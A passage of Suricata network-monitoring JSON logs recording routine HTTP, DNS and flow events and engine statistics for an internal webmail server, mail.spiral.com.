_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":109},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2675,"new_pruned":15,"est_pruned":2260,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":24139,"memcap_state":0,"memcap_global":0},"http":{"memuse":56764,"memcap":0}}} {"timestamp":"2020-02-29T00:04:55.334911+0000","flow_id":509385984074491,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34736,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5266},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21568,"tx_id":0}} {"timestamp":"2020-02-29T00:04:56.000454+0000","flow_id":1166765069131310,"event_type":"flow","src_ip":"192.168.10.122","src_port":33141,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:55.351790+0000","end":"2020-02-28T23:59:55.457599+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:57.000258+0000","flow_id":289883071232958,"event_type":"flow","src_ip":"192.168.10.122","src_port":59034,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:59:56.375742+0000","end":"2020-02-28T23:59:56.487105+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:59.000659+0000","flow_id":1802819661102183,"event_type":"flow","src_ip":"192.168.10.122","src_port":33902,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:59:58.359527+0000","end":"2020-02-28T23:59:58.464835+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:04:59.384895+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":38736,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":23764,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:04:59.493660+0000","flow_id":2220367811436415,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38736,"proto":"UDP","dns":{"type":"answer","id":23764,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:04:59.622045+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683}} {"timestamp":"2020-02-29T00:05:00.000493+0000","flow_id":1754728927280743,"event_type":"flow","src_ip":"192.168.10.130","src_port":34722,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":5,"bytes_toserver":1095,"bytes_toclient":725,"start":"2020-02-29T00:03:47.409191+0000","end":"2020-02-29T00:03:59.345249+0000","age":12,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:01.000179+0000","event_type":"stats","stats":{"uptime":13953,"capture":{"kernel_packets":133316,"kernel_drops":0},"decoder":{"pkts":133318,"bytes":92322961,"invalid":181,"ipv4":131877,"ipv6":8,"ethernet":133318,"raw":0,"null":0,"sll":0,"tcp":126802,"udp":4880,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2696,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2712,"synack":2703,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1739,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2224,"failed_udp":110},"tx":{"http":4514,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2301}},"flow_mgr":{"closed_pruned":2677,"new_pruned":15,"est_pruned":2262,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":2,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23478,"memcap_state":0,"memcap_global":0},"http":{"memuse":125401,"memcap":0}}} {"timestamp":"2020-02-29T00:05:02.000756+0000","flow_id":387009461891405,"event_type":"flow","src_ip":"192.168.10.122","src_port":46406,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:00.930125+0000","end":"2020-02-29T00:00:01.041456+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.000230+0000","flow_id":1136275096733977,"event_type":"flow","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:02.592153+0000","end":"2020-02-29T00:00:02.697211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:03.919178+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7683},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":41495,"tx_id":0}} {"timestamp":"2020-02-29T00:05:03.934083+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54065,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":44365,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:04.042931+0000","flow_id":607994139066563,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54065,"proto":"UDP","dns":{"type":"answer","id":44365,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:04.149827+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174}} {"timestamp":"2020-02-29T00:05:04.179927+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5174},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":24573,"tx_id":1}} {"timestamp":"2020-02-29T00:05:04.194971+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704}} {"timestamp":"2020-02-29T00:05:04.196998+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":704},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":2070,"tx_id":2}} {"timestamp":"2020-02-29T00:05:04.222557+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611}} {"timestamp":"2020-02-29T00:05:04.225081+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52686,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460}} {"timestamp":"2020-02-29T00:05:04.223946+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/js\/list.js?v=bef6a81df654c73d2a7fc487bc2a4694","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/mnemo\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":611},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/js\/list.js","state":"CLOSED","stored":false,"size":1658,"tx_id":3}} {"timestamp":"2020-02-29T00:05:04.224524+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397}} {"timestamp":"2020-02-29T00:05:04.225825+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/mnemo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":397},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/mnemo.png","state":"CLOSED","stored":false,"size":397,"tx_id":4}} {"timestamp":"2020-02-29T00:05:04.269330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240}} {"timestamp":"2020-02-29T00:05:04.306330+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-000.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":240},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-000.png","state":"CLOSED","stored":false,"size":240,"tx_id":5}} {"timestamp":"2020-02-29T00:05:04.306764+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52684,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:05:05.001844+0000","flow_id":1193329442411942,"event_type":"flow","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:00:03.906662+0000","end":"2020-02-29T00:00:04.012140+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:06.000219+0000","flow_id":290368418484945,"event_type":"flow","src_ip":"192.168.10.81","src_port":52680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1083,"bytes_toclient":709,"start":"2020-02-29T00:04:00.070353+0000","end":"2020-02-29T00:04:05.216909+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:07.000500+0000","flow_id":223959634101441,"event_type":"flow","src_ip":"192.168.10.130","src_port":34724,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":1291,"bytes_toclient":7935,"start":"2020-02-29T00:03:59.345281+0000","end":"2020-02-29T00:04:06.663673+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:05:07.362761+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37139,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64893,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:07.471041+0000","flow_id":871962829359369,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37139,"proto":"UDP","dns":{"type":"answer","id":64893,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:07.707629+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34738,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129}} {"timestamp":"2020-02-29T00:05:08.000161+0000","event_type":"stats","stats":{"uptime":13960,"capture":{"kernel_packets":133341,"kernel_drops":0},"decoder":{"pkts":133370,"bytes":92349561,"invalid":181,"ipv4":131929,"ipv6":8,"ethernet":133370,"raw":0,"null":0,"sll":0,"tcp":126850,"udp":4884,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2698,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2714,"synack":2705,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1741,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2226,"failed_udp":110},"tx":{"http":4522,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2303}},"flow_mgr":{"closed_pruned":2679,"new_pruned":15,"est_pruned":2266,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23147,"memcap_state":0,"memcap_global":0},"http":{"memuse":160851,"memcap":0}}} {"timestamp":"2020-02-29T00:05:09.227475+0000","flow_id":1750343770728430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52686,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/search.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/mnemo\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":460},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/search.png","state":"CLOSED","stored":false,"size":460,"tx_id":0}} {"timestamp":"2020-02-29T00:05:09.311665+0000","flow_id":1969571786109511,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52684,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":6}} {"timestamp":"2020-02-29T00:05:10.000306+0000","flow_id":1310461790902159,"event_type":"flow","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:09.579471+0000","end":"2020-02-29T00:00:09.690288+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:12.708607+0000","flow_id":579007405056244,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34738,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/turba\/search.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6129},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":30702,"tx_id":0}} {"timestamp":"2020-02-29T00:05:13.000243+0000","flow_id":2128300873612889,"event_type":"flow","src_ip":"192.168.10.122","src_port":33617,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:00:11.917081+0000","end":"2020-02-29T00:00:12.027870+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:05:13.280490+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46499,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":34980,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:05:13.388520+0000","flow_id":212195723528106,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46499,"proto":"UDP","dns":{"type":"answer","id":34980,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:05:13.456437+0000","flow_id":342874398464368,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34740,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3339}} {"timestamp":"2020-02-29T00:05:15.000206+0000","event_type":"stats","stats":{"uptime":13967,"capture":{"kernel_packets":133393,"kernel_drops":0},"decoder":{"pkts":133399,"bytes":92358527,"invalid":181,"ipv4":131956,"ipv6":8,"ethernet":133399,"raw":0,"null":0,"sll":0,"tcp":126875,"udp":4886,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":692,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2699,"ssn_memcap_drop":0,"pseudo":340,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2715,"synack":2706,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":139,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1742,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":102,"dcerpc_udp":0,"dns_udp":2227,"failed_udp":110},"tx":{"http":4523,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2304}},"flow_mgr":{"closed_pruned":2680,"new_pruned":15,"est_pruned":2267,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_b